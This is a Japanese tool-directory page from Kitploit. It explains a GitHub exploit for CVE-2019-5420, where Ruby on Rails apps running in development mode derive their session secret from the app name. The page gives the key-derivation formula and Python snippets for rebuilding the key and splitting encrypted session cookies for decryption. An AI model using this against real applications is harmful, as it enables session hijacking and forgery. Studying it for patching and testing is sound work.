Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-5420 — 脆弱性により、攻撃者が自動生成された開発モードの秘密トークンを推測できる可能性があります。 | Kitploit
ツール/GitHubGitHub/j4k0m/cve-2019-5420
暗号化/復号化ツールパスワード攻撃脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト
GitHubj4k0m/cve-2019-5420

CVE-2019-5420

脆弱性により、攻撃者が自動生成された開発モードの秘密トークンを推測できる可能性があります。

リポジトリを見る
5125年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-5420

脆弱性により、攻撃者が自動生成された開発モードのシークレットトークンを推測できる可能性があります。

Ruby-on-Railsが開発モードで実行されている場合。開発モードでは、攻撃者がセッションを保護するために使用されるキーを推測することが可能です。

復号化:

キー生成:

Railsは3つの環境(development, test, production)を使用します。アプリケーションが開発モードを使用する場合、シークレットトークンを推測し、暗号化されたセッションを復号化することができます。

セッションを保護するために使用されるキーは、アプリケーション名から派生します。

例:

root@kitploit:~
rails new Jakom

Jakom: アプリケーション名。

これにより、キーが生成メソッドの出力であることを推測できます:

root@kitploit:~
PKDF2_HMAC_SHA1[ MD5 [ APPNAME + "::Application" ] , salt: "authenticated encrypted cookie" , iterations: 1000 , key's length: 32 ]

ここで見られるように:

root@kitploit:~
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)

キーを使ってセッションを復号化する:

Railsでは、セッションはAES-265-GCMで暗号化されています。キーがあれば、セッションの復号化/暗号化が可能です。

最後に必要なのはセッションの形式です:

root@kitploit:~
BASE64 [ DATA ] -- BASE64 [ IV ] -- BASE64 [ AUTH_TAG ]

復号化の例:

ここで見られるように:

root@kitploit:~
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")

セッションクッキーの最初の部分は暗号化データ、2番目の部分はIV、3番目の部分はGCMタグ(認証タグ)です。 これらの情報を使って、セッションを直接復号化できます: image

例:

image

ツールをダウンロード